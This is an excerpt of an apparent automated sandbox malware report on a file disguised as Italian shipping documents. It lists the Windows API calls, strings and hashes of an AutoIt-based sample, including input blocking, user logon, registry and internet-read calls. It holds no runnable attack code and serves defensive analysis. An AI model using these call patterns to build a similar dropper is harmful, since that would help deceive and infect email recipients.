                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        APIs
                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                        • FindClose.KERNEL32(00000000), ref: 004339EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                        • String ID:
                        • API String ID: 901099227-0
                        APIs
                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Proc
                        • String ID:
                        • API String ID: 2346855178-0
                        APIs
                        • BlockInput.USER32(00000001), ref: 0045A38B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        APIs
                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: N@
                        • API String ID: 0-1509896676
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 02c0ad54cb2b56ddc0e13455ad42edb9d8abe4600fefd048555b01e559cc235c
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 05019278A00109EFCB48DF98C5909AEF7B5FB48310F2085D9E919A7701E730AE42DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        APIs
                        • DeleteObject.GDI32(?), ref: 0045953B
                        • DeleteObject.GDI32(?), ref: 00459551
                        • DestroyWindow.USER32(?), ref: 00459563
                        • GetDesktopWindow.USER32 ref: 00459581
                        • GetWindowRect.USER32(00000000), ref: 00459588
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                        • ShowWindow.USER32(?,00000004), ref: 00459865
                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                        • GetStockObject.GDI32(00000011), ref: 004598CD
                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                        • DeleteDC.GDI32(00000000), ref: 004598F8
                        • _wcslen.LIBCMT ref: 00459916
                        • _wcscpy.LIBCMT ref: 0045993A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                        • GetDC.USER32(00000000), ref: 004599FC
                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 4040870279-2373415609
                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0044181E
                        • SetTextColor.GDI32(?,?), ref: 00441826
                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                        • GetSysColor.USER32(0000000F), ref: 00441849
                        • SetBkColor.GDI32(?,?), ref: 00441864
                        • SelectObject.GDI32(?,?), ref: 00441874
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                        • GetSysColor.USER32(00000010), ref: 004418B2
                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                        • DeleteObject.GDI32(?), ref: 004418D5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                        • FillRect.USER32(?,?,?), ref: 00441970
                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                        • String ID:
                        • API String ID: 69173610-0
                        • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                        • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                        APIs
                        • DestroyWindow.USER32(?), ref: 004590F2
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                        • GetStockObject.GDI32(00000011), ref: 004592AC
                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                        • DeleteDC.GDI32(00000000), ref: 004592D6
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                        • GetStockObject.GDI32(00000011), ref: 004593D3
                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-3360698832
                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                        APIs
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                        • SetCursor.USER32(00000000), ref: 0043075B
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                        • SetCursor.USER32(00000000), ref: 00430773
                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                        • SetCursor.USER32(00000000), ref: 0043078B
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                        • SetCursor.USER32(00000000), ref: 004307A3
                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                        • SetCursor.USER32(00000000), ref: 004307BB
                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                        • SetCursor.USER32(00000000), ref: 004307D3
                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                        • SetCursor.USER32(00000000), ref: 004307EB
                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                        • SetCursor.USER32(00000000), ref: 00430803
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                        • SetCursor.USER32(00000000), ref: 0043081B
                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                        • SetCursor.USER32(00000000), ref: 00430833
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                        • SetCursor.USER32(00000000), ref: 0043084B
                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                        • SetCursor.USER32(00000000), ref: 00430863
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                        • SetCursor.USER32(00000000), ref: 0043087B
                        • SetCursor.USER32(00000000), ref: 00430887
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                        • SetCursor.USER32(00000000), ref: 0043089F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Cursor$Load
                        • String ID:
                        • API String ID: 1675784387-0
                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                        APIs
                        • GetSysColor.USER32(0000000E), ref: 00430913
                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                        • GetSysColor.USER32(00000012), ref: 00430933
                        • SetTextColor.GDI32(?,?), ref: 0043093B
                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                        • GetSysColor.USER32(0000000F), ref: 00430959
                        • CreateSolidBrush.GDI32(?), ref: 00430962
                        • GetSysColor.USER32(00000011), ref: 00430979
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                        • SetBkColor.GDI32(?,?), ref: 004309A6
                        • SelectObject.GDI32(?,?), ref: 004309B4
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                        • GetSysColor.USER32(00000011), ref: 00430A9F
                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                        • SelectObject.GDI32(?,?), ref: 00430AD0
                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                        • SelectObject.GDI32(?,?), ref: 00430AE3
                        • DeleteObject.GDI32(?), ref: 00430AE9
                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1582027408-0
                        • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                        • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 3217815495-966354055
                        • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                        • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                        APIs
                        • GetCursorPos.USER32(?), ref: 004566AE
                        • GetDesktopWindow.USER32 ref: 004566C3
                        • GetWindowRect.USER32(00000000), ref: 004566CA
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                        • DestroyWindow.USER32(?), ref: 00456746
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                        • IsWindowVisible.USER32(?), ref: 0045682C
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                        • GetWindowRect.USER32(?,?), ref: 00456873
                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
